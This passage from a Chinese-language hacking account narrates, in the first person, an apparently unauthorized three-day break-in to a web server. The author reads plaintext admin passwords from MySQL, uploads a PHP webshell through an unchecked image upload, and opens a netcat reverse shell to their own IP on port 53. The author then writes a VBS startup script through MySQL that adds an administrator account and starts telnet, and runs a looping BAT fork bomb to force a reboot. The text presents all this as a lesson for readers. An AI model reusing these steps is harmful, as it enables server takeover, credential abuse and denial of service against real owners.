4,絕處逢生
第2天一打開電腦,就在cmd里輸入telnet ip,返回的卻是:
正在連接到xxx.xxx.xxx.xxx...不能打開到主機(jī)的連接, 在端口 23: 連接失敗
當(dāng)時(shí)真的很郁悶,又想到了21的FTP,又一個(gè)思路冒出來(lái),一個(gè)serv-u,設(shè)置好密碼后在把serv-udaemon.ini寫進(jìn)對(duì)方主機(jī),最后登陸,不過(guò)仔細(xì)想想還是不行,因?yàn)镸YSQL導(dǎo)出的文件不能覆蓋其他文件……
不行,我還是不能放棄,我把注意力轉(zhuǎn)移到MYSQL的數(shù)據(jù)上,仔細(xì)搜索,發(fā)現(xiàn)一個(gè)“wangzhan\"的列,進(jìn)入后發(fā)現(xiàn)USER的表,看到里面有幾個(gè)帳號(hào),密碼是名文保存的,接著我聯(lián)想到網(wǎng)站上的管理系統(tǒng),于是馬上依照了第一個(gè)行的帳號(hào)登入,結(jié)果證明了我的猜測(cè),我成功的進(jìn)入了,只有發(fā)布新聞,等欄目,
并沒(méi)有什么關(guān)于設(shè)置的選項(xiàng),但是我還是試了一下,點(diǎn)發(fā)布新聞,一個(gè)“上傳圖片”的框框映入了我的眼簾,我試著用它上傳phpshell,填好標(biāo)題,內(nèi)容等后,點(diǎn)了確定,另人激動(dòng)的時(shí)刻到了,我成功了,順利的傳了上去,看來(lái)終究是自己編的,竟然沒(méi)有對(duì)后錯(cuò)名做限制,出現(xiàn):
home/photo/2013245321.php上傳成功,
結(jié)果我通過(guò)這個(gè)路徑,得到了phpshell,當(dāng)時(shí)的心情真是無(wú)法用言語(yǔ)形容,但是我們現(xiàn)在的權(quán)限還太小,只能讀寫文件,要取道ADMIN權(quán)限才能算真正的占領(lǐng),接著我開始了提升權(quán)限……
5,最后的決戰(zhàn)
經(jīng)過(guò)不懈的努力,終于有一個(gè)PHPSHELL,這個(gè)小小的SHELL,整整經(jīng)過(guò)我2天的努力,最后就是提升權(quán)限了,再上傳一個(gè)NC,
反向連接:
back(被我改名了) myip 53 -e cmd.exe
就是把幫定的CMDSHELL返回到我的53端口上,然后在自己機(jī)上運(yùn)行
back -vv -l -p 53
順利的得到了SHELL
得到CMDSHELL先看看是什么系統(tǒng)
type %windir%\\system32\\$winnt$.inf
發(fā)現(xiàn)有win adv,這幾個(gè)字母,初步判定是win高級(jí)服務(wù)器版
再看看他打了什么補(bǔ)丁吧,輸入:regedit /e r.reg HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\hotfix,意思是導(dǎo)出
HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\hotfix,里面含有補(bǔ)丁的信息,但沒(méi)成功導(dǎo)出,怎么辦呢,仔細(xì)看看WINNT里面的目錄,發(fā)現(xiàn)有一些Q打頭的LOG文件,它就是打了SP后遺留下來(lái)的日志文件,用TYPE命令查看,里面有許多是SP4的文件名,很有可能打了SP4,那樣的話就麻煩了……
首先試試WMI吧,是eyas寫的提升權(quán)限的東西,可以在SP3的機(jī)上建立一個(gè)XX的超級(jí)管理員,上傳并運(yùn)行以后,結(jié)果在我意料之中—拒絕訪問(wèn),看來(lái)真的打了SP4,這樣可就麻煩了,輸入net start,看看開了什么服務(wù),發(fā)現(xiàn)幾個(gè)可以利用的服務(wù):
mysql
Serv-U
于是我開是替換服務(wù)了,但可悲的是,這兩個(gè)軟件都裝在C盤,而且C盤是NTFS,更改名字就是拒絕訪問(wèn),殺進(jìn)程就更別說(shuō)了,哎,感覺(jué)又沒(méi)有辦法了,但是我還是不能放棄!(神都應(yīng)該被我的精神感動(dòng)了吧)仔細(xì)想想,我又回到了MYSQL上面,因?yàn)镸YSQL肯定是ADMIN裝的,也就是說(shuō)隸屬于ADMIN的啟動(dòng)范圍之類,也就是說(shuō)可以利用它寫個(gè)腳本然后放在“啟動(dòng)”項(xiàng)內(nèi),于是我趕緊輸入:
use test;
create table 2(cmd TEXT);
insert into 2 values (\"set wsh=CreateObject(\"\"WScript.Shell\"\")\")
insert into 2 values (\"wsh.run \"\"net.exe user aaa aa /add\"\",0\")
insert into 2 values (\"wsh.run \"\"net localgroup administrators aaa /add\"\",0\")
insert into 2 values (\"wsh.run \"net start telnet\",0\")
最后導(dǎo)出在所有USER的“啟動(dòng)”項(xiàng)內(nèi),最后就是等服務(wù)器重起了,不過(guò)俺是個(gè)急性子的人,利用messenge漏洞吧,雖然它不能得到SHELL但能使服務(wù)器重起,但仔細(xì)一看原來(lái)服務(wù)器根本就沒(méi)啟動(dòng)MESSENGE服務(wù),更別說(shuō)漏洞了……
怎么辦呢,寫個(gè)BAT吧,內(nèi)容為:
:begin
start cmd
goto begin
也就是不停的運(yùn)行CMD,呵呵,更拒絕服務(wù)差不多,不一會(huì)CPU就會(huì)SAY GOODBYE了。
重起之后的事就不用說(shuō)了吧……
至此終于入侵完了,回顧整個(gè)入侵,幾起幾落,真的是很不容易,耗時(shí)3天,最后終于成功了,希望各位讀者們能從這篇文章學(xué)會(huì)一些有用的知識(shí),而最重要的就是要有永不放棄的精神,而且要善于分析問(wèn)題。
